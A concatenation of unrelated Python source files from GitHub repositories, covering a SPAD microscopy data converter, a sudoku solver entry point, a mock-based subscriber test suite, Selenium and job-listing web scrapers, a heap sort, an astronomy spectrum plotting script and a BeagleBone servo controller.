    bit-for-bit equivalent to the original unrolled shift/mask sequence.

    Args:
        values: N x 2 unsigned int array with measurements
        out: N x 25 unsigned int array that receives the counts (in place)
    """
    layout = (
        (0, 0, 5, 4), (1, 0, 9, 4), (2, 0, 13, 4), (3, 0, 17, 4),
        (4, 0, 21, 4), (5, 0, 25, 4),
        (6, 1, 5, 5), (7, 1, 10, 6), (8, 1, 16, 5), (9, 1, 21, 4),
        (10, 1, 25, 4), (11, 1, 29, 6), (12, 1, 35, 10), (13, 1, 45, 6),
        (14, 1, 51, 4), (15, 1, 55, 4), (16, 1, 59, 5),
        (17, 0, 29, 6), (18, 0, 35, 5), (19, 0, 40, 4), (20, 0, 44, 4),
        (21, 0, 48, 4), (22, 0, 52, 4), (23, 0, 56, 4), (24, 0, 60, 4),
    )
    for column, word, shift, width in layout:
        mask = (1 << width) - 1
        out[:, column] = np.bitwise_and(np.right_shift(values[:, word], shift), mask)
def reshape_to_5d(count, frames, y, x, time_per_pixel):
    """Reshape the flat N x 25 count matrix into a 5-D stack.

    Args:
        count: N x 25 count matrix
        frames: number of frames contained in the matrix
        y: number of image rows per frame
        x: number of image columns per row
        time_per_pixel: number of time bins per pixel

    Returns:
        A 5-D matrix with dimensions (frames, y, x, time, sensor)
    """
    target_shape = (frames, y, x, time_per_pixel, 25)
    return np.reshape(count, target_shape)
def reshape_to_6d(count, r, z, y, x, t=1, c=25):
    """Reshape the flat count data into a 6-D stack.

    Args:
        count: flat count data with r*z*y*x*t*c elements
        r: number of repetitions
        z: number of z planes (or frames)
        y: number of image rows
        x: number of image columns
        t: number of time bins per pixel (default 1)
        c: number of sensor channels (default 25)

    Returns:
        A 6-D matrix with dimensions (r, z, y, x, t, c)
    """
    # Fix: the channel dimension was hard-coded to 25, silently ignoring
    # the ``c`` parameter; it now honours ``c`` (default unchanged, so all
    # existing 25-channel callers behave identically).
    return np.reshape(count, (r, z, y, x, t, c))
def image2h5(fname, sumTime=True, saveTimeInd=False):
    """
    Convert a bin image file to one or more h5 files.

    Args:
        fname: bin file name (output names are derived from it)
        sumTime: if True, sum the counts over all time bins
        saveTimeInd: controls per-time-bin export when sumTime is False:
            True -> one h5 file per time frame;
            "alternate" -> cumulative sums of even/odd frames in separate
            files (one pair per summing depth).

    Returns:
        The (channel-first) array that was written.

    TO DO:
        add metadata to file:
        data.pixelsize = 0.05
        data.pixelsizeU = 'um', etc.
    """
    print(fname)
    [out, frames, y, x, time_per_pixel] = file_to_count(fname)
    data = reshape_to_5d(out, frames, y, x, time_per_pixel)
    if np.ndim(data) == 4 and frames == 1 and sumTime:
        # 4D data set [y, x, time, ch] --> sum over time bins
        dataOut = np.sum(data, 2)
        dataOut = np.float64(dataOut)
        # channel must be first channel
        dataOut = np.transpose(dataOut, (2, 0, 1))
    elif np.ndim(data) == 5 and sumTime:
        # 5D data set [z, y, x, time, ch] --> sum over time bins
        dataOut = np.sum(data, 3)
        dataOut = np.float64(dataOut)
        dataOut = np.transpose(dataOut, (3, 0, 1, 2))
    else:
        print('not summed over time bins')
        # channel must be first channel
        dataOut = np.squeeze(data)
        if saveTimeInd:
            dataOut = np.transpose(dataOut, (3, 0, 1, 2))
    dataOut = np.squeeze(dataOut)
    if type(saveTimeInd) == bool and saveTimeInd:
        # One h5 file per time frame (last axis after the transpose above).
        for i in range(np.shape(dataOut)[-1]):
            print("Saving frame " + str(i))
            h5f = h5py.File(fname[:-4] + "_frame_" + str(i) + ".h5", 'w')
            h5f.create_dataset('dataset_1', data=dataOut[:,:,:,i])
            h5f.close()
    elif saveTimeInd == "alternate":
        # channel, y, x, time: sum even-indexed and odd-indexed time frames
        # separately, at increasing summing depths.
        Nt = np.shape(dataOut)[-1]
        for sumT in range(int(Nt/2)):
            print("Summing over " + str(sumT+1) + " frames")
            dataOutSum0 = np.squeeze(np.sum(dataOut[:,:,:,0:2*sumT+1:2], 3))
            dataOutSum1 = np.squeeze(np.sum(dataOut[:,:,:,1:2*sumT+2:2], 3))
            # store frame 0
            h5f = h5py.File(fname[:-4] + "_sum_" + str(sumT+1) + "_frame_0.h5", 'w')
            h5f.create_dataset('dataset_1', data=dataOutSum0)
            h5f.close()
            # store frame 1
            h5f = h5py.File(fname[:-4] + "_sum_" + str(sumT+1) + "_frame_1.h5", 'w')
            h5f.create_dataset('dataset_1', data=dataOutSum1)
            h5f.close()
    else:
        # Single output file (note: [:-3] keeps the dot of ".bin"-style names).
        h5f = h5py.File(fname[:-3] + "h5", 'w')
        h5f.create_dataset('dataset_1', data=dataOut)
        h5f.close()
    return dataOut
def ttr2h5(fnamettr, reorder25channels=True, CHANNELS=25, laser_MHz=80.0, dwell_time_us=10):
    # Convert a single .ttr time-tag file to .h5 via libttp: read it into a
    # pandas frame, then export all CHANNELS channels with the given laser
    # repetition rate and pixel dwell time.
    df = ttp.readNewProtocolFileToPandas(fnamettr, reorder25channels=reorder25channels, CHANNELS=CHANNELS)
    ttp.convertFromPandasDataFrame(df, fnamettr[:-4] + '.h5', laser_MHz=laser_MHz, dwell_time_us=dwell_time_us, list_of_channels=list(np.arange(CHANNELS)))
def allTtr2h5(folder=''):
    """Convert every .ttr file in folder that has no .h5 counterpart yet."""
    files = listFiles(folder, filetype='ttr')
    filesh5 = listFiles(folder, filetype='h5')
    # Map existing .h5 names back to the .ttr names they came from, so
    # already-converted files can be skipped below.
    for i, file in enumerate(filesh5):
        filesh5[i] = file[:-3] + '.ttr'
    for file in files:
        if file not in filesh5:
            print("converting " + file)
            ttr2h5(file)
    print('Done')
def bin2h5(fname):
    """
    Convert a bin file to an h5 file, always stored 6-D as (r, z, y, x, t, c).

    Args:
        fname: bin file name; the .h5 output uses the same base name.

    TO DO: add metadata to file:
        data.pixelsize = 0.05
        data.pixelsizeU = 'um', etc.
    """
    [out, frames, y, x, time_per_pixel] = file_to_count(fname)
    # r is fixed to 1; frames become the z dimension, 25 sensor channels.
    data = reshape_to_6d(out, 1, frames, y, x, time_per_pixel, 25)
    # store data
    h5f = h5py.File(fname[:-4] + ".h5", 'w')
    h5f.create_dataset('dataset_1', data=data)
    h5f.close()
    print('Done')
def allBinImages2tiff(folder):
    """
    Convert all bin files in a folder to tiff images
    folder      path to folder (use either \\ or / to go into a folder)
    """
    files = listFiles(folder)
    for file in files:
        print("saving " + file)
        # image2tiff writes the files as a side effect; its return value is
        # unused.
        dummy = image2tiff(file)
def image2tiff(fname):
    """
    Convert a bin image file to tiff files (per-channel stack + RGB sum).

    Args:
        fname: bin file name; pixel size is read from '<fname>_info.txt'.
    """
    [out, frames, y, x, time_per_pixel] = file_to_count(fname)
    data = reshape_to_5d(out, frames, y, x, time_per_pixel)
    print(np.shape(data))
    info = getFileInfo(fname[:-4] + '_info.txt')
    if np.ndim(data) == 4 and frames == 1:
        # 4D data set [y, x, time, ch] --> sum over time bins
        dataOut = np.sum(data, 2)
    elif np.ndim(data) == 5:
        # 5D data set [z, y, x, time, ch] --> sum over time bins and z
        dataOut = np.sum(data, 3)
        dataOut = np.sum(dataOut, 0)
    # NOTE(review): if neither branch above matches (ndim 4 with frames > 1),
    # dataOut is unbound and the next line raises NameError — confirm that
    # case cannot occur for real acquisitions.
    dataOut = np.float64(dataOut)
    dataOut = np.squeeze(dataOut)
    print(np.shape(dataOut))
    array2tiff(dataOut, fname[:-4], pxsize=info.pxsize, dim="yxz", transpose3=True)
    array2RGBtiff(np.sum(dataOut, 2), fname[:-4] + '_RGB')
def allBinImages2h5(folder, sumTime=True, saveTimeInd=False):
    """
    Convert all bin files in a folder to h5 files
    folder      path to folder (use either \\ or / to go into a folder)
    sumTime     True to sum over all time bins, false otherwise
    saveTimeInd forwarded to image2h5 (per-time-frame export mode)
    """
    files = listFiles(folder)
    for file in files:
        print("converting " + file)
        # image2h5 writes the files as a side effect; its return value is
        # unused.
        dummy = image2h5(file, sumTime, saveTimeInd)
# Entry point: decode one binary file and save the 5-D count matrix as .npy.
if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="Converter from binary file to measurement matrix"
    )
    parser.add_argument(
        "binary",
        help="binary file name")
    args = parser.parse_args()
    fname = args.binary
    # Fix: file_to_count returns None on a read error; unpacking that
    # directly (as before) raised a TypeError before the None check could
    # run, so the error message was unreachable.  Check first, then unpack.
    result = file_to_count(fname)
    if result is None:
        print("Failed to process data. Closing.")
        sys.exit(0)
    count, frames, y, x, time_per_pixel = result
    file_name, extension = os.path.splitext(fname)  # Get filename without extension
    print("Saving 5D matrix...", sep="")
    count5d = reshape_to_5d(count, frames, y, x, time_per_pixel)
    np.save(file_name + ".npy", count5d)
    print("Done.")
| VicidominiLab/libspadffs | spad_fcs/meas_to_count.py | meas_to_count.py | py | 12,651 | python | en | code | 0 | github-code | 36 |
7392241864 |
import argparse
from . import board
from . import constants
from . import solver
def parse_args():
    """Parse the command line: an optional board string and a --manual flag."""
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument("board", nargs="?")
    arg_parser.add_argument("-m", "--manual", action="store_true", default=False)
    return arg_parser.parse_args()
def main():
    """Build a Board from the CLI argument (or the test board) and solve it."""
    args = parse_args()
    # Fall back to the built-in test board when no board string was given.
    if not args.board:
        main_board = board.Board(constants.TEST_BOARD)
    else:
        main_board = board.Board(args.board)
    # print(tile.Tile.get((1, 1)).render())
    # print(tile.Tile.get((2, 2)).render())
    # print(main_board.render())
    s = solver.Solver(main_board, manual=args.manual)
    s.solve()
# Entry point when executed as a script (e.g. "python sudoku.py <board>").
if __name__ == '__main__':
    main()
| MattCCS/SudokuSolver | sudoku.py | sudoku.py | py | 698 | python | en | code | 0 | github-code | 36 |
class Subscriber:
    """In-memory subscriber registry: add/remove clients and message them."""

    def __init__(self):
        # Each client is a dict with string "name" and "email" fields.
        self.clients = []

    def add(self, name, email):
        """Register a new client and return the updated client list.

        Raises:
            TypeError: if name or email is not a string.
            Exception: if an identical client is already registered.
        """
        # Validate types first (isinstance instead of type(...) == str) so
        # malformed input is always reported as TypeError.
        if not (isinstance(name, str) and isinstance(email, str)):
            raise TypeError("Bad type name or/and email")
        client = {"name": name, "email": email}
        # Stored clients have exactly these two keys, so dict equality is a
        # full duplicate check.
        if client in self.clients:
            raise Exception("This client exists")
        self.clients.append(client)
        return self.clients

    def delete(self, name, email):
        """Remove a registered client and return a confirmation string.

        Raises:
            Exception: if no matching client is registered.
        """
        client = {"name": name, "email": email}
        if client not in self.clients:
            raise Exception("Lack client")
        self.clients.remove(client)
        return "Delete: %s, email: %s" % (name, email)

    def sendMessage(self, email, textMessage):
        """Send textMessage to the client with the given email.

        Raises:
            TypeError: if textMessage is not a string (and email is known).
            Exception: if no client has the given email.
        """
        for client in self.clients:
            if client["email"] == email:
                if not isinstance(textMessage, str):
                    raise TypeError("Type text message have to be string")
                return "Send message to %s" % email
        raise Exception("No client has this email")
from unittest.mock import *
from unittest import TestCase, main
class testSubscriber(TestCase):
    """Unit tests for Subscriber built entirely on unittest.mock.

    NOTE(review): every test replaces the method under test with a Mock()
    and then asserts on the mock's configured return_value/side_effect, so
    these tests verify the mock configuration rather than Subscriber's real
    logic.  Consider calling the real methods instead.
    """
    def setUp(self):
        self.temp = Subscriber()
    def test_add_client_OK(self):
        self.temp.add = Mock()
        self.temp.add.return_value = [{"name": "Piotr", "email": "piotrnowak@example.com"}]
        result = self.temp.add("Piotr", "piotrnowak@example.com")
        self.assertListEqual(result, [{"name": "Piotr", "email": "piotrnowak@example.com"}])
    def test_add_client_BAD_exists(self):
        self.temp.add = Mock()
        self.temp.clients = [{"name": "Piotr", "email": "piotrnowak@example.com"}]
        self.temp.add.side_effect = Exception("This client exists")
        result = self.temp.add
        self.assertRaisesRegex(Exception, "This client exist", result, "Piotr", "piotrnowak@example.com")
    def test_add_client_BAD_name(self):
        self.temp.add = Mock()
        self.temp.add.side_effect = TypeError("Bad type name or/and email")
        result = self.temp.add
        self.assertRaisesRegex(TypeError, "Bad type name or/and email", result, 123, "piotrnowak@example.com")
    def test_delete(self):
        self.temp.delete = Mock()
        self.temp.clients = [{"name": "Wiktoria", "email": "wolnikowa@example.com"},
                             {"name": "Kasia", "email": "kasiapolak@example.com"}]
        self.temp.delete.return_value = "Delete: Wiktoria, email: wolnikowa@example.com"
        result = self.temp.delete("Wiktoria", "wolnikowa@example.com")
        self.assertEqual(result, "Delete: Wiktoria, email: wolnikowa@example.com")
    def test_delete_client_lack_client(self):
        self.temp.delete = Mock()
        self.temp.clients = [{"name": "Wiktoria", "email": "wolnikowa@example.com"},
                             {"name": "Kasia", "email": "kasiapolak@example.com"}]
        self.temp.delete.side_effect = Exception("Lack client")
        result = self.temp.delete
        self.assertRaisesRegex(Exception, "Lack client", result, "Filip", "filipostrowski@example.com")
    def test_send_message(self):
        self.temp.sendMessage = Mock()
        self.temp.clients = [{"name": "Wiktoria", "email": "wolnikowa@example.com"},
                             {"name": "Kasia", "email": "kasiapolak@example.com"}]
        self.temp.sendMessage.return_value = "Send message to kasiapolak@example.com"
        result = self.temp.sendMessage("kasiapolak@example.com", "Hello")
        self.assertEqual(result, "Send message to kasiapolak@example.com")
    def test_send_message_bad_type_message(self):
        self.temp.sendMessage = Mock()
        self.temp.clients = [{"name": "Wiktoria", "email": "wolnikowa@example.com"},
                             {"name": "Kasia", "email": "kasiapolak@example.com"}]
        self.temp.sendMessage.side_effect = TypeError("Type text message have to be string")
        result = self.temp.sendMessage
        self.assertRaisesRegex(TypeError, "Type text message have to be string", result, "kasiapolak@example.com",
                               False)
    def test_send_message_clients_BAD_email(self):
        self.temp.sendMessage = Mock()
        self.temp.clients = [{"name": "Wiktoria", "email": "wolnikowa@example.com"},
                             {"name": "Kasia", "email": "kasiapolak@example.com"}]
        self.temp.sendMessage.side_effect = Exception("No client has this email")
        result = self.temp.sendMessage
        self.assertRaisesRegex(Exception, "No client has this email", result, "bartekkowalslki@example.com", "Hello")
# Run the test suite when executed directly (unittest.main).
if __name__ == '__main__':
    main()
42300807705 | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
# NOTE(review): `url` is an empty placeholder — driver.get('') will fail.
# Judging by the 'q' search box and the 'h3 > a' result selector, this
# presumably targets a Google-style results page; set `url` before running.
url = ''
driver = webdriver.Chrome()
driver.get(url)
# Type the query into the search box and submit with Enter.
element_founder = driver.find_element_by_name('q')
element_founder.send_keys('selenium')
element_founder.send_keys(Keys.RETURN)
# Collect the result links and print their titles.
results = driver.find_elements_by_css_selector('h3 > a')
for result in results:
    print(result.text)
| seriybeliy11/parsers | sel_parser.py | sel_parser.py | py | 380 | python | en | code | 0 | github-code | 36 |
26284873290 | # To sort an array considering it as a nearly complete binary tree and then sorting it using max heapify
def max_heapify(mh, idx):
    """Sift mh[idx] down until the subtree rooted at idx is a max heap.

    Assumes the subtrees below idx already satisfy the heap property.
    """
    left = (idx << 1) + 1
    right = (idx + 1) << 1
    largest = idx
    if left < len(mh) and mh[left] > mh[largest]:
        largest = left
    if right < len(mh) and mh[right] > mh[largest]:
        largest = right
    if largest != idx:
        mh[idx], mh[largest] = mh[largest], mh[idx]
        max_heapify(mh, largest)


def build_max_heap(mh):
    """Rearrange mh in place into a max heap."""
    # Sifting leaves is a no-op, so it suffices to start at the last
    # internal node and work up to the root.
    for i in range(len(mh) // 2, -1, -1):
        max_heapify(mh, i)


def heap_sort(mh):
    """Heap-sort: empties mh and returns its elements in descending order.

    Note: as before, the input list is consumed (left empty) and the
    returned list holds the values largest-first.
    """
    # Fix: the original rebuilt the entire heap on every iteration, making
    # the sort far slower than necessary.  Building once and restoring the
    # heap with a single sift-down per extraction gives the classic
    # O(n log n) algorithm with identical results.
    build_max_heap(mh)
    result = []
    while mh:
        last = len(mh) - 1
        mh[0], mh[last] = mh[last], mh[0]
        result.append(mh.pop())
        max_heapify(mh, 0)
    return result
| deveshaggrawal19/projects | Algorithms/Searching and Sorting/Heap_Sort.py | Heap_Sort.py | py | 822 | python | en | code | 0 | github-code | 36 |
20928709222 | #!/usr/bin/env python
# coding: utf-8
# In[6]:
import time
import json
import pandas as pd
import re
import logging
from datetime import date, datetime, timedelta
from selenium import webdriver
from selenium.webdriver.firefox.service import Service
from selenium.webdriver.common.by import By
from webdriver_manager.chrome import ChromeDriverManager
# Launch a visible (non-headless) Chrome instance at import time; the
# matching chromedriver binary is downloaded/installed automatically.
opts=webdriver.ChromeOptions()
opts.headless=False
driver = webdriver.Chrome(ChromeDriverManager().install() ,options=opts)
def date_extract(jobs):
    """Convert 'days ago' tokens into ISO date strings.

    Each element of *jobs* is a list of day-count tokens scraped from a
    posting (e.g. ['2'] for "2 days ago"); an empty list means the job was
    posted today.  One date string is produced per token, and today's date
    for each empty entry.
    """
    posted = []
    today = date.today()
    for tokens in jobs:
        if not tokens:
            posted.append(str(today))
            continue
        for token in tokens:
            days_back = int(str(token))
            posted.append(str(today - timedelta(days_back)))
    return posted
def get_df_from_dict(jobs):
    """Build a normalised jobs DataFrame from the scraped dict.

    Every cell is stringified and lower-cased (so duplicate postings
    compare equal) and the 'location' column is split on spaces into a
    list of tokens.  *jobs* must contain a 'location' key.
    """
    frame = pd.DataFrame.from_dict(jobs)
    lowered = frame.apply(lambda column: column.astype(str).str.lower())
    lowered.location = [place.split(" ") for place in lowered.location]
    return lowered.dropna()
def task_scrape():
jobs={"title":[],
"company":[],
"experience":[],
#"skills":[],
"date":[],
"scraper_run_dt_time":[],
"location":[]
#"jd_url":[]
}
final_df=pd.DataFrame(jobs)
#This outer loop is for number of pages to be scraped
#for role in data["job_roles"]:
# jobs={key:[] for key in jobs}
#print("hello",jobs)
for n in range(1,4):
driver.get('https://www.naukri.com/software-engineer-software-developer-data-analyst-data-scientist-machine-learning-engineer-hr-manager-project-manager-cloud-architect-full-stack-developer-full-stack-web-developer-big-data-consultant-jobs-'+str(n)+'?k=Software%20Engineer%2C%20Software%20Developer%2C%20Data%20Analyst%2C%20Data%20Scientist%2C%20Machine%20Learning%20Engineer%2C%20HR%20Manager%2C%20Project%20Manager%2C%20Cloud%20Architect%2C%20Full%20Stack%20Developer%2C%20Full%20Stack%20Web%20Developer%2C%20Big%20Data%20Consultant')
time.sleep(4)
job_container = driver.find_elements(By.CSS_SELECTOR,".jobTuple.bgWhite.br4.mb-8")
# scraping the details from webpage
for job in job_container:
driver.implicitly_wait(20)
title=job.find_element(By.CSS_SELECTOR,"a.title.fw500.ellipsis").text
company=job.find_element(By.CSS_SELECTOR,"a.subTitle.ellipsis.fleft").text
location=job.find_element(By.CSS_SELECTOR,".fleft.grey-text.br2.placeHolderLi.location").text
try:
exp=job.find_element(By.CSS_SELECTOR,".fleft.grey-text.br2.placeHolderLi.experience").text
except Exception:
exp="0 yrs"
#skills=job.find_element(By.CSS_SELECTOR,".tags.has-description").text
date_string=job.find_element(By.CSS_SELECTOR,"[class^='type br2 fleft']").text
# date_string contains strings like 2 day ago,just now,few hours ago
#jd=job.find_element(By.TAG_NAME,"a").get_attribute("href")
date=re.findall(r'\d+',date_string) #extracting numbers out of the date_string
jobs["title"].append(title)
jobs["company"].append(company)
jobs["location"].append(location)
jobs["experience"].append(exp)
#jobs["skills"].append(skills)
jobs["date"].append(date)
#jobs["jd_url"].append(jd)
jobs["scraper_run_dt_time"].append(datetime.today())
jobs["date"]=date_extract(jobs["date"])
try:
print(type(jobs))
dataframe=get_df_from_dict(jobs)
print(type(dataframe))
dataframe[15:25]
final_df=final_df.append(dataframe)
except:
logging.error("Error in dict_to_df")
now=datetime.today()
dt_time=now.strftime("%H%M%S")
dt=now.strftime("%Y%m%d")
filename="scraped_"+dt+"_"+dt_time
final_df.info()
final_df[40:45]
final_df.to_csv('{}.csv'.format(filename))
driver.quit
task_scrape()
# In[ ]:
| shivanianand/NaukriDataAnalysis | Scraping_final.py | Scraping_final.py | py | 4,365 | python | en | code | 0 | github-code | 36 |
40858491511 | #!/usr/bin/env python
import sys
import fitsio
import healpy
import numpy as np
import scipy as sp
import argparse
import matplotlib.pyplot as plt
from scipy.interpolate import interp1d
from picca.data import forest
from picca.data import delta
from picca import io
if __name__ == '__main__':
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--plate', type = int, default = None, required=True,
help = 'Plate of spectrum')
parser.add_argument('--mjd', type = int, default = None, required=True,
help = 'Modified Julian Date of spectrum')
parser.add_argument('--fiberid', type = int, default = None, required=True,
help = 'fiber of spectrum')
parser.add_argument('--drq', type = str, default = None, required=True,
help = 'DRQ file')
parser.add_argument('--nside', type = int, default = 16, required=False,
help = 'healpix nside')
parser.add_argument('--spectrum', type = str, default = None, required=True,
help = 'data directory for all the spectra')
parser.add_argument('--no-project', action="store_true", required=False,
help = 'do not project out continuum fitting modes')
parser.add_argument('--in-dir',type = str,default=None,required=True,
help='data directory')
parser.add_argument('--lambda-min',type = float,default=3600.,required=False,
help='lower limit on observed wavelength [Angstrom]')
parser.add_argument('--lambda-max',type = float,default=5500.,required=False,
help='upper limit on observed wavelength [Angstrom]')
parser.add_argument('--lambda-rest-min',type = float,default=1040.,required=False,
help='lower limit on rest frame wavelength [Angstrom]')
parser.add_argument('--lambda-rest-max',type = float,default=1200.,required=False,
help='upper limit on rest frame wavelength [Angstrom]')
parser.add_argument('--rebin',type = int,default=3,required=False,
help='rebin wavelength grid by combining this number of adjacent pixels (ivar weight)')
parser.add_argument('--mode',type = str,default='pix',required=False,
help='open mode: pix, spec, spcframe')
parser.add_argument('--dla-vac',type = str,default=None,required=False,
help='dla catalog file')
parser.add_argument('--dla-mask',type = float,default=0.8,required=False,
help='lower limit on the DLA transmission. Transmissions below this number are masked')
parser.add_argument('--mask-file',type = str,default=None,required=False,
help='Path to file to mask regions in lambda_OBS and lambda_RF. In file each line is: region_name region_min region_max (OBS or RF) [Angstrom]')
parser.add_argument('--flux-calib',type = str,default=None,required=False,
help='Path to file to previously produced picca_delta.py file to correct for multiplicative errors in the flux calibration')
parser.add_argument('--ivar-calib',type = str,default=None,required=False,
help='Path to previously produced picca_delta.py file to correct for multiplicative errors in the pipeline inverse variance calibration')
args = parser.parse_args()
### forest args
forest.lmin = np.log10(args.lambda_min)
forest.lmax = np.log10(args.lambda_max)
forest.lmin_rest = np.log10(args.lambda_rest_min)
forest.lmax_rest = np.log10(args.lambda_rest_max)
forest.rebin = args.rebin
forest.dll = args.rebin*1e-4
forest.dla_mask = args.dla_mask
### Get Healpy pixel of the given QSO
objs = {}
ra,dec,zqso,thid,plate,mjd,fid = io.read_drq(args.drq,0.,1000.,keep_bal=True)
cut = (plate==args.plate) & (mjd==args.mjd) & (fid==args.fiberid)
if cut.sum()==0:
print("Object not in drq")
sys.exit()
ra = ra[cut]
dec = dec[cut]
zqso = zqso[cut]
thid = thid[cut]
plate = plate[cut]
mjd = mjd[cut]
fid = fid[cut]
phi = ra
th = sp.pi/2.-dec
pix = healpy.ang2pix(args.nside,th,phi)
### Get data
data = None
if args.mode == "pix":
data = io.read_from_pix(args.in_dir,pix[0],thid, ra, dec, zqso, plate, mjd, fid, order=None, log=None)
elif args.mode in ["spec","corrected-spec"]:
data = io.read_from_spec(args.in_dir,thid, ra, dec, zqso, plate, mjd, fid, order=None, mode=args.mode,log=None)
elif args.mode =="spcframe":
data = io.read_from_spcframe(args.in_dir,thid, ra, dec, zqso, plate, mjd, fid, order=None, mode=args.mode, log=None)
if data is None:
print("Object not in in_dir")
sys.exit()
else:
data = data[0]
### Correct multiplicative flux calibration
if (args.flux_calib is not None):
try:
vac = fitsio.FITS(args.flux_calib)
head = vac[1].read_header()
ll_st = vac[1]['loglam'][:]
st = vac[1]['stack'][:]
w = (st!=0.)
forest.correc_flux = interp1d(ll_st[w],st[w],fill_value="extrapolate")
vac.close()
except:
print(" Error while reading flux_calib file {}".format(args.flux_calib))
sys.exit(1)
### Correct multiplicative pipeline inverse variance calibration
if (args.ivar_calib is not None):
try:
vac = fitsio.FITS(args.ivar_calib)
ll = vac[2]['LOGLAM'][:]
eta = vac[2]['ETA'][:]
forest.correc_ivar = interp1d(ll,eta,fill_value="extrapolate",kind="nearest")
vac.close()
except:
print(" Error while reading ivar_calib file {}".format(args.ivar_calib))
sys.exit(1)
### Get the lines to veto
usr_mask_obs = None
usr_mask_RF = None
usr_mask_RF_DLA = None
if (args.mask_file is not None):
try:
usr_mask_obs = []
usr_mask_RF = []
usr_mask_RF_DLA = []
with open(args.mask_file, 'r') as f:
loop = True
for l in f:
if (l[0]=='#'): continue
l = l.split()
if (l[3]=='OBS'):
usr_mask_obs += [ [float(l[1]),float(l[2])] ]
elif (l[3]=='RF'):
usr_mask_RF += [ [float(l[1]),float(l[2])] ]
elif (l[3]=='RF_DLA'):
usr_mask_RF_DLA += [ [float(l[1]),float(l[2])] ]
else:
raise
usr_mask_obs = np.log10(np.asarray(usr_mask_obs))
usr_mask_RF = np.log10(np.asarray(usr_mask_RF))
usr_mask_RF_DLA = np.log10(np.asarray(usr_mask_RF_DLA))
if usr_mask_RF_DLA.size==0:
usr_mask_RF_DLA = None
except:
print(" Error while reading mask_file file {}".format(args.mask_file))
sys.exit(1)
### Veto lines
if not usr_mask_obs is None:
if ( usr_mask_obs.size+usr_mask_RF.size!=0):
data.mask(mask_obs=usr_mask_obs , mask_RF=usr_mask_RF)
### Correct for DLAs
if not args.dla_vac is None:
print("adding dlas")
dlas = io.read_dlas(args.dla_vac)
for p in data:
for d in data[p]:
if d.thid in dlas:
for dla in dlas[d.thid]:
data.add_dla(dla[0],dla[1],usr_mask_RF_DLA)
### Get delta from picca_delta
done_delta = None
f = args.spectrum+"/delta-"+str(pix[0])+".fits.gz"
hdus = fitsio.FITS(f)
ds = [delta.from_fitsio(h) for h in hdus[1:]]
for d in ds:
if (d.plate==args.plate) and (d.mjd==args.mjd) and (d.fid==args.fiberid):
d.project()
done_delta = d
hdus.close()
break
if done_delta is None:
hdus.close()
print("Object not in spectrum")
sys.exit()
### Observed l
plt.errorbar(10**data.ll,data.fl,linewidth=2,color='black')
plt.errorbar(10**done_delta.ll,done_delta.co,linewidth=4,color='red')
plt.xlabel(r'$\lambda_{\mathrm{Obs.}} \, [\mathrm{\AA}]$',fontsize=30)
plt.ylabel(r'$f \, [10^{-19} \mathrm{W \, m^{-2} \, nm^{-1}}]$',fontsize=30)
plt.grid()
plt.show()
### RF l
plt.errorbar(10**data.ll/(1.+done_delta.zqso),data.fl,linewidth=4,color='black')
plt.errorbar(10**done_delta.ll/(1.+done_delta.zqso),done_delta.co,linewidth=4,color='red')
plt.xlabel(r'$\lambda_{\mathrm{R.F.}} \, [\mathrm{\AA}]$',fontsize=30)
plt.ylabel(r'$f \, [10^{-19} \mathrm{W \, m^{-2} \, nm^{-1}}]$',fontsize=30)
plt.grid()
plt.show()
| vserret/picca | tutorials/picca_plotSpec.py | picca_plotSpec.py | py | 8,731 | python | en | code | 0 | github-code | 36 |
19173841991 | #max duty_ns is 20ms and min is 5ms. We want 180 degrees (divisions)#Some variables
# This values may change depending on your servos
MIN_DUTY_NS = 500000
MAX_DUTY_NS = 2000000
PWM_FRECUENCY = 50 #hz
DEGREE_TO_NS = (MAX_DUTY_NS-MIN_DUTY_NS)/180
PWM_PATH = "/sys/class/pwm/"
# -------------- from bonescript's bone.js ----------------------
gpio0 = 0
gpio1 = gpio0+32
gpio2 = gpio1+32
gpio3 = gpio2+32
pwm_pins = {
"P8_13": { "name": "EHRPWM2B", "gpio": gpio0+23, "mux": "gpmc_ad9", "eeprom": 15, "pwm" : "ehrpwm.2:1" },
"P8_19": { "name": "EHRPWM2A", "gpio": gpio0+22, "mux": "gpmc_ad8", "eeprom": 14, "pwm" : "ehrpwm.2:0" },
"P9_14": { "name": "EHRPWM1A", "gpio": gpio1+18, "mux": "gpmc_a2", "eeprom": 34, "pwm" : "ehrpwm.1:0" },
"P9_16": { "name": "EHRPWM1B", "gpio": gpio1+19, "mux": "gpmc_a3", "eeprom": 35, "pwm" : "ehrpwm.1:1" },
"P9_31": { "name": "SPI1_SCLK", "gpio": gpio3+14, "mux": "mcasp0_aclkx", "eeprom": 65 , "pwm": "ehrpwm.0:0"},
"P9_29": { "name": "SPI1_D0", "gpio": gpio3+15, "mux": "mcasp0_fsx", "eeprom": 61 , "pwm": "ehrpwm.0:1"},
"P9_42": { "name": "GPIO0_7", "gpio": gpio0+7, "mux": "ecap0_in_pwm0_out", "eeprom": 4, "pwm": "ecap.0"},
"P9_28": { "name": "SPI1_CS0", "gpio": gpio3+17, "mux": "mcasp0_ahclkr", "eeprom": 63, "pwm": "ecap.2" },
}
class Servo:
def attach(self, pin):
if not pin in pwm_pins:
raise Exception('Pin ' + pin + ' is not pwm capable')
else:
self.__pin = PWM_PATH+pwm_pins[pin]["pwm"]
val = open(self.__pin + "/request").read()
if val.find('free') < 0:
raise Exception('Pin ' + pin + ' is already in use')
self.__lastValue = 0
open(self.__pin + "/request", 'w').write("1")
open(self.__pin + "/run", 'w').write("0")
open(self.__pin + "/period_freq", 'w').write(str(PWM_FRECUENCY))
open(self.__pin + "/duty_ns", 'w').write(str(MIN_DUTY_NS)) #init to 0 degree
open(self.__pin + "/run", 'w').write("1")
self.__attached = True
def write(self, value):
duty_ns = MIN_DUTY_NS + value * DEGREE_TO_NS
self.__lastValue = value
open(self.__pin + "/duty_ns", 'w').write(str(duty_ns))
def writeMicroseconds(self, value):
open(self.__pin + "/duty_ns", 'w').write(str(value)+"000") #micro to nano
def read(self):
return self.__lastValue
def attached(self):
return self.__attached
def detach(self):
open(self.__pin + "/run", 'w').write("0")
open(self.__pin + "/request", 'w').write("0")
self.__attached = False
| maxpowel/BeagleBone-Tools | servo/servo.py | servo.py | py | 2,482 | python | en | code | 20 | github-code | 36 |
6394496653 | # Copyright (c) 2023 Graphcore Ltd. All rights reserved.
# The functional definition in this file was ported to Python
